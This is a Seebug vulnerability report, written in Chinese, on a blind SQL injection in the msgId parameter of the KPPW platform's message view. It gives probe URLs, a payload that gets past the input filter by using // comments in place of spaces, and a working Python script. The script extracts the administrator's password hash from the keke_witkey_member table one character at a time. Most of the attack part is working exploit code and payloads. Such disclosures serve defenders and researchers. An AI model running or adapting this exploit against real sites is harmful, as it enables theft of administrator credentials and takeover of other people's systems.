KPPW最新版本 绕过防护继续盲注

2015-03-31T00:00:00
ID SSV:94510
Type seebug
Reporter Root
Modified 2015-03-31T00:00:00

Description

简要描述:

KPPW2620150327UTF-8.zip 3月27 最新版本

详细说明:

Url1: http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1

<img src="https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">

Url2: http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1

<img src="https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">

Url3: http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2

<img src="https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

由此可见 可以注入。 不过也有一些过滤。 不过可以绕过。 &&(select//CHAR(48))=SUBSTR((SELECT//password//from//keke_witkey_member//WHERE//uid=1),1,1) 附上验证脚本

```

coding:utf-8

import httplib def get(i1,i2): page="" rHtml=httplib.HTTPConnection("localhost",80,False) url="/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%26(select%2f%2fCHAR("+i1+"))%3dSUBSTR((SELECT%2f%2fpassword%2f%2ffrom%2f%2fkeke_witkey_member%2f%2fWHERE%2f%2fuid%3d1)%2c"+i2+",1%29" #print url rHtml.request("GET",url,headers={"User-Agent":"Firefox/22.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Cookie":"PHPSESSID=*","Connection":"keep-alive"})#session 需要自己设置 page=rHtml.getresponse(False) return page.read().count('msgId=73')#关键字 大家可以自己设置 mm=[] for i in range(1,33): for ii in range(48,123): if(get(str(ii),str(i))!=0): mm.append(chr(ii)) print "".join(mm) break ```

效果

<img src="https://images.seebug.org/upload/201503/272325156ad62e1f592a32c84a7611cfd24d0cb3.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">